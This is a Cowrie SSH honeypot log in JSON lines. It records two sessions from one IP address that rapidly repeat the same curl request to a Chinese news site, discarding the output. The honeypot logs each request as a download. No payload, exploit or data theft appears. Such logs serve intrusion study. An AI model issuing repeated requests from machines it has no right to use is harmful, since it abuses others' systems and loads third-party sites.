{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.849771Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.850857Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.853367Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.854507Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.897600Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.898823Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.903050Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.904341Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.908502Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.935971Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.937114Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.943202Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.944146Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.979044Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.980371Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:49.986371Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:49.987271Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.014418Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.018229Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.019426Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.025396Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.026901Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.029209Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.038930Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.054240Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.055463Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.059856Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.067639Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.068707Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.096867Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.097651Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.111415Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.112477Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.133979Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.134999Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.140526Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.151403Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.152486Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.170262Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.171367Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.189984Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.191200Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.210767Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.211911Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.224193Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.237615Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.238746Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.246393Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.247439Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.277408Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.278477Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.281559Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.282475Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.302256Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.317900Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.319223Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.320062Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.324472Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.326128Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.327255Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.349133Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.357401Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.358465Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.364863Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.366174Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.394556Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.395499Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.399596Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.404076Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.406125Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.407345Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.425945Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.433386Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.434999Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.449386Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.450647Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.464290Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.469619Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.470624Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.475860Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.492549Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.493941Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.506502Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.507720Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.527776Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.530280Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.532655Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.533758Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.537810Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.542639Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.543482Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.860764Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.861912Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.863079Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.864169Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.866528Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.867590Z","src_ip":"212.227.125.160","session":"7541ed730449"}
